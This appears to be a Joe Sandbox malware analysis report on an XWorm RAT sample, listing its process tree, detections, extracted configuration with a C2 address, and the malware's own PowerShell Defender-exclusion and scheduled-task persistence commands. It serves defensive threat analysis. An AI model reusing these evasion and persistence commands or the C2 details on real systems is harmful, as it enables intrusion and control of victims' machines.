Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583457
MD5:f33eeceda472b6cc6b7880dbba4f4d1f
SHA1:f7aadb89b32d89f593b4c1064d29209496468460
SHA256:beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F33EECEDA472B6CC6B7880DBBA4F4D1F)
    • All function.exe (PID: 4400 cmdline: "C:\Users\user\AppData\Roaming\All function.exe" MD5: A23632476984A0D607DBF76B1096432F)
      • ALL slumzick.exe (PID: 6120 cmdline: "C:\Users\user\AppData\Roaming\ALL slumzick.exe" MD5: 735BD603CC2800BDB3972CC2B561E86A)
      • svchost.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
    • svchost.exe (PID: 512 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
      • powershell.exe (PID: 3444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 736 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6828 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 1196 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\svchost.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xc74b:$str01: $VB$Local_Port
      • 0xc778:$str02: $VB$Local_Host
      • 0xac5f:$str03: get_Jpeg
      • 0xb2bf:$str04: get_ServicePack
      • 0xde10:$str05: Select * from AntivirusProduct
      • 0xe707:$str06: PCRestart
      • 0xe71b:$str07: shutdown.exe /f /r /t 0
      • 0xe7cd:$str08: StopReport
      • 0xe7a3:$str09: StopDDos
      • 0xe899:$str10: sendPlugin
      • 0xea19:$str12: -ExecutionPolicy Bypass -File "
      • 0xec88:$str13: Content-length: 5235
      C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd5c5:$s6: VirtualBox
      • 0xd523:$s8: Win32_ComputerSystem
      • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xeba3:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x301dd:$s6: VirtualBox
          • 0x4121d:$s6: VirtualBox
          • 0x3013b:$s8: Win32_ComputerSystem
          • 0x4117b:$s8: Win32_ComputerSystem
          • 0x31d95:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x42dd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x31e32:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x42e72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x31f47:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x42f87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x317bb:$cnc4: POST / HTTP/1.1
          • 0x427fb:$cnc4: POST / HTTP/1.1
          00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd3c5:$s6: VirtualBox
            • 0xd323:$s8: Win32_ComputerSystem
            • 0xef7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xf01a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xf12f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xe9a3:$cnc4: POST / HTTP/1.1
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.svchost.exe.950000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              3.0.svchost.exe.950000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                3.0.svchost.exe.950000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                • 0xc74b:$str01: $VB$Local_Port
                • 0xc778:$str02: $VB$Local_Host
                • 0xac5f:$str03: get_Jpeg
                • 0xb2bf:$str04: get_ServicePack
                • 0xde10:$str05: Select * from AntivirusProduct
                • 0xe707:$str06: PCRestart
                • 0xe71b:$str07: shutdown.exe /f /r /t 0
                • 0xe7cd:$str08: StopReport
                • 0xe7a3:$str09: StopDDos
                • 0xe899:$str10: sendPlugin
                • 0xea19:$str12: -ExecutionPolicy Bypass -File "
                • 0xec88:$str13: Content-length: 5235
                3.0.svchost.exe.950000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xd5c5:$s6: VirtualBox
                • 0xd523:$s8: Win32_ComputerSystem
                • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xeba3:$cnc4: POST / HTTP/1.1
                2.2.All function.exe.38e6818.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 27 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4576, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
                  Sigma detected: Suspect Svchost Activity
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 6828, ProcessName: svchost.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Schedule system process
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T20:12:05.630002+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:12.238570+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:17.745407+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:29.859822+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:41.956314+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:42.265305+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:51.510194+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T20:12:05.659317+010028529231Malware Command and Control Activity Detected192.168.2.105456245.141.26.1347000TCP
                  2025-01-02T20:12:17.747411+010028529231Malware Command and Control Activity Detected192.168.2.105456245.141.26.1347000TCP
                  2025-01-02T20:12:29.966060+010028529231Malware Command and Control Activity Detected192.168.2.105456245.141.26.1347000TCP
                  2025-01-02T20:12:41.959243+010028529231Malware Command and Control Activity Detected192.168.2.105456245.141.26.1347000TCP
                  2025-01-02T20:12:51.511184+010028529231Malware Command and Control Activity Detected192.168.2.105456245.141.26.1347000TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-02T20:12:12.238570+010028528741Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP
                  2025-01-02T20:12:42.265305+010028528741Malware Command and Control Activity Detected45.141.26.1347000192.168.2.1054562TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\All function.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Roaming\All function.exeReversingLabs: Detection: 82%
                  Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 91%
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\All function.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: 45.141.26.134
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7000
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: %AppData%
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpString decryptor: svchost.exe
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_04d5f5f7-8
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr
